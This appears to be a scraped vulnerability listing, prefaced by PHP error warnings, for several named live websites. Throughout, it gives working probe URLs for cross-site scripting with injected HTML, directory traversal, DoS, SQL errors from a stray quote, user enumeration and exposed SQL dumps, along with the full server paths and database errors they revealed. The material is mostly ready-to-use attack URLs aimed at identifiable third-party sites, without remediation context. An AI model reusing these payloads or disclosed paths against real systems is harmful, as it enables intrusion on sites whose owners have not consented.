Warning: Cannot modify header information - headers already sent by (output started at /home/www/vampirecity.cx-music.com/includes/header2.php:10) in /home/www/vampirecity.cx-music.com/includes/header2.php on line 11
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/www/vampirecity.cx-music.com/includes/header2.php on line 10
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/www/vampirecity.cx-music.com/includes/header2.php:10) in /home/www/vampirecity.cx-music.com/includes/header2.php on line 10
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/www/vampirecity.cx-music.com/includes/header2.php:10) in /home/www/vampirecity.cx-music.com/includes/header2.php on line 10
Warning: Cannot modify header information - headers already sent by (output started at /home/www/vampirecity.cx-music.com/includes/header2.php:10) in /home/www/vampirecity.cx-music.com/includes/header2.php on line 11
Includes Directory:
http://vampirecity.cx-music.com/includes/
Includes Directory:
http://vampirecity.cx-music.com/forum/includes/
Log File:
-
Array:
http://www.sims2news.com/premierhomes/index.php?filter[]
Array:
http://www.sims2news.com/premierhomes/mainframe/search.php?story[]
Array:
http://www.sims2news.com/premierhomes/mainframe/search.php?user[]
Array:
http://www.sims2news.com/premierhomes/mainframe/search.php?title[]
Array:
http://www.sims2news.com/private/premierhomes/index.php?filter[]
Array:
http://www.sims2news.com/private/premierhomes/mainframe/search.php?story[]
Array:
http://www.sims2news.com/private/premierhomes/mainframe/search.php?user[]
Array:
http://www.sims2news.com/private/premierhomes/mainframe/search.php?title[]
CAPTCHA:
The solution for the CAPTCHA is in the source code.
Cross Site Scripting:
Cross Site Scripting:
Cross Site Scripting:
Cross Site Scripting:
http://www.sims2news.com/mobile.php?"><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.sims2news.com/premierhomes/mainframe/search.php?title="><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.sims2news.com/premierhomes/mainframe/search.php?user="><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.sims2news.com/index.php?"><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.sims2news.com/news/show_news.php?"><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.sims2news.com/index.php?page=<marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.sims2news.com/premierhomes/mainframe/search.php?story="><marquee><h1>vulnerable</marquee>
Directory Transversal:
http://www.sims2news.com/premierhomes/index.php?filter=../index
Directory Transversal:
http://www.sims2news.com/private/premierhomes/index.php?filter=../../index
DOS:
http://www.sims2news.com/premierhomes/index.php?filter=index
DOS:
http://www.sims2news.com/private/premierhomes/index.php?filter=index
Full Path Disclosure:
http://www.sims2news.com/private/premierhomes/mainframe/show_news.php?subaction=showcomments
Warning: Division by zero in /home/sims2new/public_html/private/premierhomes/mainframe/inc/functions.inc.php on line 469Warning: Division by zero in /home/sims2new/public_html/private/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/private/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/private/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/private/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/private/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/private/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/private/premierhomes/mainframe/inc/functions.inc.php on line 469
Full Path Disclosure:
http://www.sims2news.com/private/premierhomes/index.php?filter=../../index
Warning: main(./news/show_news.php) [function.main]: failed to open stream: No such file or directory in /home/sims2new/public_html/index.php on line 142Warning: main(./news/show_news.php) [function.main]: failed to open stream: No such file or directory in /home/sims2new/public_html/index.php on line 142
Warning: main() [function.include]: Failed opening './news/show_news.php' for inclusion (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/sims2new/public_html/index.php on line 142
Full Path Disclosure:
http://www.sims2news.com/private/premierhomes/index.php?filter=a
Warning: main(./a.php) [function.main]: failed to open stream: No such file or directory in /home/sims2new/public_html/private/premierhomes/index.php on line 264Warning: main(./a.php) [function.main]: failed to open stream: No such file or directory in /home/sims2new/public_html/private/premierhomes/index.php on line 264
Warning: main() [function.include]: Failed opening './a.php' for inclusion (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/sims2new/public_html/private/premierhomes/index.php on line 264
Full Path Disclosure:
http://www.sims2news.com/premierhomes/mainframe/show_news.php?subaction=showcomments
Warning: Division by zero in /home/sims2new/public_html/premierhomes/mainframe/inc/functions.inc.php on line 469Warning: Division by zero in /home/sims2new/public_html/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/premierhomes/mainframe/inc/functions.inc.php on line 469
Warning: Division by zero in /home/sims2new/public_html/premierhomes/mainframe/inc/functions.inc.php on line 469
Full Path Disclosure:
http://www.sims2news.com/mobile.php?id[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 35Full Path Disclosure:
http://www.sims2news.com/mobile.php?subaction[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 34Full Path Disclosure:
http://www.sims2news.com/mobile.php?archive[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 33Full Path Disclosure:
http://www.sims2news.com/mobile.php?ucat[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 36Full Path Disclosure:
http://www.sims2news.com/mobile.php?start_from[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 32Full Path Disclosure:
http://www.sims2news.com/mobile.php?page[]
Warning: preg_match() expects parameter 2 to be string, array given in /home/sims2new/public_html/index.php on line 131Full Path Disclosure:
http://www.sims2news.com/mobile.php?archive=a
Warning: file(/home/sims2new/public_html/news/data/archives/a.news.arch) [function.file]: failed to open stream: No such file or directory in /home/sims2new/public_html/news/inc/shows.inc.php on line 616Warning: Invalid argument supplied for foreach() in /home/sims2new/public_html/news/inc/shows.inc.php on line 621
Warning: Invalid argument supplied for foreach() in /home/sims2new/public_html/news/inc/shows.inc.php on line 654
Full Path Disclosure:
http://www.sims2news.com/premierhomes/index.php?filter=../index
Warning: main(./news/show_news.php) [function.main]: failed to open stream: No such file or directory in /home/sims2new/public_html/index.php on line 142Warning: main(./news/show_news.php) [function.main]: failed to open stream: No such file or directory in /home/sims2new/public_html/index.php on line 142
Warning: main() [function.include]: Failed opening './news/show_news.php' for inclusion (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/sims2new/public_html/index.php on line 142
Full Path Disclosure:
http://www.sims2news.com/index.php?id[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 35Full Path Disclosure:
http://www.sims2news.com/phpinfo.php
Full Path Disclosure:
http://www.sims2news.com/index.php?subaction[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 34Full Path Disclosure:
http://www.sims2news.com/index.php?archive[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 33Full Path Disclosure:
http://www.sims2news.com/index.php?ucat[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 36Full Path Disclosure:
http://www.sims2news.com/index.php?start_from[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 32Full Path Disclosure:
http://www.sims2news.com/index.php?page[]
Warning: preg_match() expects parameter 2 to be string, array given in /home/sims2new/public_html/index.php on line 131Full Path Disclosure:
http://www.sims2news.com/index.php?archive=a
Warning: file(/home/sims2new/public_html/news/data/archives/a.news.arch) [function.file]: failed to open stream: No such file or directory in /home/sims2new/public_html/news/inc/shows.inc.php on line 616Warning: Invalid argument supplied for foreach() in /home/sims2new/public_html/news/inc/shows.inc.php on line 621
Warning: Invalid argument supplied for foreach() in /home/sims2new/public_html/news/inc/shows.inc.php on line 654
Full Path Disclosure:
http://www.sims2news.com/premierhomes/index.php?filter=a
Warning: main(./a.php) [function.main]: failed to open stream: No such file or directory in /home/sims2new/public_html/premierhomes/index.php on line 264Warning: main(./a.php) [function.main]: failed to open stream: No such file or directory in /home/sims2new/public_html/premierhomes/index.php on line 264
Warning: main() [function.include]: Failed opening './a.php' for inclusion (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/sims2new/public_html/premierhomes/index.php on line 264
Full Path Disclosure:
http://www.sims2news.com/news/show_news.php?id[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 35Full Path Disclosure:
http://www.sims2news.com/news/show_news.php?subaction[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 34Full Path Disclosure:
http://www.sims2news.com/news/show_news.php?archive[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 33Full Path Disclosure:
http://www.sims2news.com/news/show_news.php?ucat[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 36Full Path Disclosure:
http://www.sims2news.com/news/show_news.php?start_from[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 32Full Path Disclosure:
http://www.sims2news.com/news/show_news.php?page[]
Warning: preg_match() expects parameter 2 to be string, array given in /home/sims2new/public_html/index.php on line 131Full Path Disclosure:
http://www.sims2news.com/news/show_news.php?archive=a
Warning: file(/home/sims2new/public_html/news/data/archives/a.news.arch) [function.file]: failed to open stream: No such file or directory in /home/sims2new/public_html/news/inc/shows.inc.php on line 616Warning: Invalid argument supplied for foreach() in /home/sims2new/public_html/news/inc/shows.inc.php on line 621
Warning: Invalid argument supplied for foreach() in /home/sims2new/public_html/news/inc/shows.inc.php on line 654
Full Path Disclosure:
http://www.sims2news.com/test.php?id[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 35Full Path Disclosure:
http://www.sims2news.com/test.php?subaction[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 34Full Path Disclosure:
http://www.sims2news.com/test.php?archive[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 33Full Path Disclosure:
http://www.sims2news.com/test.php?ucat[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 36Full Path Disclosure:
http://www.sims2news.com/test.php?start_from[]
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/sims2new/public_html/news/inc/functions.inc.php on line 32Full Path Disclosure:
http://www.sims2news.com/test.php?page[]
Warning: preg_match() expects parameter 2 to be string, array given in /home/sims2new/public_html/index.php on line 131Full Path Disclosure:
http://www.sims2news.com/test.php?archive=a
Warning: file(/home/sims2new/public_html/news/data/archives/a.news.arch) [function.file]: failed to open stream: No such file or directory in /home/sims2new/public_html/news/inc/shows.inc.php on line 616Warning: Invalid argument supplied for foreach() in /home/sims2new/public_html/news/inc/shows.inc.php on line 621
Warning: Invalid argument supplied for foreach() in /home/sims2new/public_html/news/inc/shows.inc.php on line 654
PHP Source Code Disclosure:
http://www.sims2news.com/forum/index.php~
User Enumeration:
http://www.sims2news.com/~nobody
User Enumeration:
http://www.sims2news.com/~root
User Enumeration:
-
Array:
http://www.rovexchange.com/mc_company_listings.php?q[]
Array:
http://www.rovexchange.com/mc_eqpt_for_sale.php?equipment_categ=a&q[]
Array:
http://www.rovexchange.com/mc_company_listings.php?business_categ[]
Array:
http://www.rovexchange.com/mc_eqpt_for_sale.php?equipment_categ[]
Array:
http://www.rovexchange.com/mc_eqpt_for_sale.php?q[]
Array:
http://www.rovexchange.com/mc_company_listings.php?business_categ=a&q[]
Cross Site Scripting:
http://www.rovexchange.com/mc_company_listings.php?business_categ=<marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.rovexchange.com/mc_eqpt_for_sale.php?equipment_categ=<marquee><h1>vulnerable</marquee>
Cross Site Scripting:
There is Cross Site Scripting when you log in if your password contains ">code.
Cross Site Scripting:
There is Cross Site Scripting when you log in if your username contains ">code.
Cross Site Scripting:
There is Cross Site Scripting on https://www.rovexchange.com/signup_add_company.php if the fields contain ">code.
Cross Site Scripting:
http://www.rovexchange.com/mc_company_listings.php?q="><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
Cross Site Scripting:
SQL Error:
http://www.rovexchange.com/mc_company_listings.php?q=a&business_categ='
SQL Error:
http://www.rovexchange.com/mc_eqpt_for_sale.php?q=a&equipment_categ='
-
-
Array:
http://livedemo.clip-bucket.com/search_result.php?query[]
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/classes/TFile.php
Parse error: syntax error, unexpected ':' in /home/clipbuck/public_html/livedemo/includes/classes/TFile.php on line 11Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/playerconfig/config.xml.php
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/clipbuck/public_html/livedemo/includes/playerconfig/config.xml.php:13) in /home/clipbuck/public_html/livedemo/includes/config.inc.php on line 18Warning: include(template_changer.php) [function.include]: failed to open stream: No such file or directory in /home/clipbuck/public_html/livedemo/includes/config.inc.php on line 164
Warning: include() [function.include]: Failed opening 'template_changer.php' for inclusion (include_path='.:/usr/local/php5/lib/php') in /home/clipbuck/public_html/livedemo/includes/config.inc.php on line 164
/home/clipbuck/public_html/livedemo/videos/ http://livedemo.clip-bucket.com/includes/playerconfig/videolist.xml.php
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/modules.php
Warning: mysql_query() [function.mysql-query]: Access denied for user 'clipbuck'@'localhost' (using password: NO) in /home/clipbuck/public_html/livedemo/includes/modules.php on line 104Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/clipbuck/public_html/livedemo/includes/modules.php on line 104
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/clipbuck/public_html/livedemo/includes/modules.php on line 105
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/defined_links.php
Fatal error: Call to undefined function Assign() in /home/clipbuck/public_html/livedemo/includes/defined_links.php on line 49Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/active.php
Fatal error: Call to undefined function Assign() in /home/clipbuck/public_html/livedemo/includes/active.php on line 45Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/adodb.php
Fatal error: Call to undefined method stdClass::Connect() in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.php on line 5Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/contrib/toxmlrpc.inc.php
Warning: require_once(xmlrpc.inc) [function.require-once]: failed to open stream: No such file or directory in /home/clipbuck/public_html/livedemo/includes/adodb/contrib/toxmlrpc.inc.php on line 20Fatal error: require_once() [function.require]: Failed opening required 'xmlrpc.inc' (include_path='.:/usr/local/php5/lib/php') in /home/clipbuck/public_html/livedemo/includes/adodb/contrib/toxmlrpc.inc.php on line 20
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/datadict/datadict-firebird.inc.php
Fatal error: Class 'ADODB_DataDict' not found in /home/clipbuck/public_html/livedemo/includes/adodb/datadict/datadict-firebird.inc.php on line 13Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/drivers/adodb-pdo_mssql.inc.php
Fatal error: Class 'ADODB_pdo' not found in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-pdo_mssql.inc.php on line 13Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/drivers/adodb-pdo_mysql.inc.php
Fatal error: Class 'ADODB_pdo' not found in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-pdo_mysql.inc.php on line 13Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/drivers/adodb-pdo_mysql.inc.php
Fatal error: Class 'ADODB_pdo' not found in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-pdo_mysql.inc.php on line 13Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/drivers/adodb-pdo_oci.inc.php
Fatal error: Class 'ADODB_pdo_base' not found in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-pdo_oci.inc.php on line 13Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/drivers/adodb-pdo_pgsql.inc.php
Fatal error: Class 'ADODB_pdo' not found in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-pdo_pgsql.inc.php on line 12Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/drivers/adodb-sybase_ase.inc.php
Warning: require_once(ADODB_DIR/drivers/adodb-sybase.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-sybase_ase.inc.php on line 14Fatal error: require_once() [function.require]: Failed opening required 'ADODB_DIR/drivers/adodb-sybase.inc.php' (include_path='.:/usr/local/php5/lib/php') in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-sybase_ase.inc.php on line 14
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/pear/Auth/Container/ADOdb.php
Warning: require_once(Auth/Container.php) [function.require-once]: failed to open stream: No such file or directory in /home/clipbuck/public_html/livedemo/includes/adodb/pear/Auth/Container/ADOdb.php on line 23Fatal error: require_once() [function.require]: Failed opening required 'Auth/Container.php' (include_path='.:/usr/local/php5/lib/php') in /home/clipbuck/public_html/livedemo/includes/adodb/pear/Auth/Container/ADOdb.php on line 23
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/session/adodb-compress-bzip2.php
Fatal error: bzip2 functions are not available in /home/clipbuck/public_html/livedemo/includes/adodb/session/adodb-compress-bzip2.php on line 14Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/session/adodb-encrypt-secret.php
Fatal error: Directory not found: '/home/clipbuck/public_html/livedemo/includes/horde' in /home/clipbuck/public_html/livedemo/includes/adodb/session/adodb-encrypt-secret.php on line 16Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/session/old/adodb-cryptsession.php
Warning: include(/home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb.inc.php) [function.include]: failed to open stream: No such file or directory in /home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb-cryptsession.php on line 64Warning: include() [function.include]: Failed opening '/home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb.inc.php' for inclusion (include_path='.:/usr/local/php5/lib/php') in /home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb-cryptsession.php on line 64
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/session/old/adodb-session-clob.php
Warning: include(/home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb.inc.php) [function.include]: failed to open stream: No such file or directory in /home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb-session-clob.php on line 90Warning: include() [function.include]: Failed opening '/home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb.inc.php' for inclusion (include_path='.:/usr/local/php5/lib/php') in /home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb-session-clob.php on line 90
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/session/old/adodb-session.php
Warning: include(/home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb.inc.php) [function.include]: failed to open stream: No such file or directory in /home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb-session.php on line 100Warning: include() [function.include]: Failed opening '/home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb.inc.php' for inclusion (include_path='.:/usr/local/php5/lib/php') in /home/clipbuck/public_html/livedemo/includes/adodb/session/old/adodb-session.php on line 100
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/benchmark.php
Fatal error: Class 'VARIANT' not found in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-ado5.inc.php on line 42Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test-active-record.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: NO) in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-mysql.inc.php on line 365Fatal error: Call to undefined method stdClass::Execute() in /home/clipbuck/public_html/livedemo/includes/adodb/tests/test-active-record.php on line 18
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test-active-recs2.php
Notice: Use of undefined constant OCI_COMMIT_ON_SUCCESS - assumed 'OCI_COMMIT_ON_SUCCESS' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084Fatal error: Call to a member function ServerInfo() on a non-object in /home/clipbuck/public_html/livedemo/includes/adodb/tests/test-active-recs2.php on line 21
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test-datadict.php
Notice: Use of undefined constant ODBC_BINMODE_RETURN - assumed 'ODBC_BINMODE_RETURN' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084Notice: Use of undefined constant SQL_CUR_USE_DRIVER - assumed 'SQL_CUR_USE_DRIVER' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084
Notice: Use of undefined constant ODBC_BINMODE_RETURN - assumed 'ODBC_BINMODE_RETURN' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084
Notice: Use of undefined constant SQL_CUR_USE_DRIVER - assumed 'SQL_CUR_USE_DRIVER' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084
Notice: Use of undefined constant OCI_COMMIT_ON_SUCCESS - assumed 'OCI_COMMIT_ON_SUCCESS' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084
Fatal error: Call to undefined function pg_escape_string() in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-postgres64.inc.php on line 241
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test-php5.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: NO) in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-mysql.inc.php on line 365Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test-xmlschema.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: NO) in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-mysql.inc.php on line 365Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test.php
Warning: mysql_pconnect() [function.mysql-pconnect]: Access denied for user 'root'@'localhost' (using password: NO) in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-mysql.inc.php on line 383Notice: Trying to get property of non-object in /home/clipbuck/public_html/livedemo/includes/adodb/tests/testdatabases.inc.php on line 244
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test2.php
Fatal error: Class 'VARIANT' not found in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-ado5.inc.php on line 42Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test3.php
Notice: Use of undefined constant OCI_COMMIT_ON_SUCCESS - assumed 'OCI_COMMIT_ON_SUCCESS' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/test4.php
Warning: mysql_pconnect() [function.mysql-pconnect]: Access denied for user 'root'@'localhost' (using password: NO) in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-mysql.inc.php on line 383Fatal error: Call to a member function prepare() on a non-object in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-pdo.inc.php on line 341
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/testcache.php
Warning: mysql_pconnect() [function.mysql-pconnect]: Unknown MySQL server host 'mangrove' (4) in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-mysql.inc.php on line 383Fatal error: Call to a member function GetArray() on a non-object in /home/clipbuck/public_html/livedemo/includes/adodb/tests/testcache.php on line 27
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/testdatabases.inc.php
Fatal error: Call to undefined function ADOLoadCode() in /home/clipbuck/public_html/livedemo/includes/adodb/tests/testdatabases.inc.php on line 295Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/testoci8.php
Notice: Use of undefined constant OCI_COMMIT_ON_SUCCESS - assumed 'OCI_COMMIT_ON_SUCCESS' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084Fatal error: Call to undefined function OCIParse() in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-oci8.inc.php on line 1001
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/testoci8cursor.php
Notice: Use of undefined constant OCI_COMMIT_ON_SUCCESS - assumed 'OCI_COMMIT_ON_SUCCESS' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084Fatal error: Call to undefined function OCIParse() in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-oci8.inc.php on line 790
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/testpaging.php
Notice: Use of undefined constant OCI_COMMIT_ON_SUCCESS - assumed 'OCI_COMMIT_ON_SUCCESS' in /home/clipbuck/public_html/livedemo/includes/adodb/adodb.inc.php on line 4084/tmp/8e/adodb_8e73344b801e58ea7543f1ce3a7a6e58.cache cache failure: /tmp/8e/adodb_8e73344b801e58ea7543f1ce3a7a6e58.cache file/URL not found (see sql below)
Fatal error: Call to undefined function OCIParse() in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-oci8.inc.php on line 1001
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/adodb/tests/testpear.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: NO) in /home/clipbuck/public_html/livedemo/includes/adodb/drivers/adodb-mysql.inc.php on line 365Fatal error: Call to undefined method PEAR_Error::setFetchMode() in /home/clipbuck/public_html/livedemo/includes/adodb/tests/testpear.php on line 24
Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/templatelib/Template_Compiler.class.php
Fatal error: Class 'Smarty' not found in /home/clipbuck/public_html/livedemo/includes/templatelib/Template_Compiler.class.php on line 35Full Path Disclosure:
http://livedemo.clip-bucket.com/includes/templatelib/plugins/modifier.date_format.php
Fatal error: Call to a member function _get_plugin_filepath() on a non-object in /home/clipbuck/public_html/livedemo/includes/templatelib/plugins/modifier.date_format.php on line 11Insecure Cookie:
You shouldn't put the username in the cookie.
SQL Dump:
http://livedemo.clip-bucket.com/includes/adodb/session/adodb-sessions.mysql.sql
SQL Dump:
http://livedemo.clip-bucket.com/includes/adodb/session/adodb-sessions.oracle.clob.sql
SQL Dump:
http://livedemo.clip-bucket.com/includes/adodb/session/adodb-sessions.oracle.sql
SQL Dump:
http://livedemo.clip-bucket.com/includes/adodb/tests/test-datadict.php
User Enumeration:
http://livedemo.clip-bucket.com/~clipbuck
User Enumeration:
http://livedemo.clip-bucket.com/~nobody
User Enumeration:
-
Array:
http://www.osflv.com/search.php?search[]
Array:
http://www.osflv.com/register.php?user[]
Array:
http://www.osflv.com/wp-login.php?redirect_to[]
Full Path Disclosure:
http://www.osflv.com/topic.php?id[]
Warning: urlencode() expects parameter 1 to be string, array given in /home/osflv/public_html/bb-includes/functions.php on line 1711Warning: Cannot modify header information - headers already sent by (output started at /home/osflv/public_html/bb-includes/functions.php:1711) in /home/osflv/public_html/wp-includes/pluggable.php on line 391
Full Path Disclosure:
http://www.osflv.com/bb-includes/akismet.php
Fatal error: Call to undefined function bb_get_option() in /home/osflv/public_html/bb-includes/akismet.php on line 2Full Path Disclosure:
http://www.osflv.com/bb-includes/bozo.php
Fatal error: Call to undefined function add_filter() in /home/osflv/public_html/bb-includes/bozo.php on line 289Full Path Disclosure:
http://www.osflv.com/bb-includes/db-mysqli.php
Fatal error: Class 'bbdb_base' not found in /home/osflv/public_html/bb-includes/db-mysqli.php on line 4Full Path Disclosure:
http://www.osflv.com/bb-includes/db.php
Fatal error: Class 'bbdb_base' not found in /home/osflv/public_html/bb-includes/db.php on line 4Full Path Disclosure:
http://www.osflv.com/bb-includes/default-filters.php
Fatal error: Call to undefined function add_filter() in /home/osflv/public_html/bb-includes/default-filters.php on line 3Full Path Disclosure:
http://www.osflv.com/wp-settings.php
Warning: require(ABSPATHwp-includes/compat.php) [function.require]: failed to open stream: No such file or directory in /home/osflv/public_html/wp-settings.php on line 117Warning: require(ABSPATHwp-includes/compat.php) [function.require]: failed to open stream: No such file or directory in /home/osflv/public_html/wp-settings.php on line 117
Fatal error: require() [function.require]: Failed opening required 'ABSPATHwp-includes/compat.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/osflv/public_html/wp-settings.php on line 117
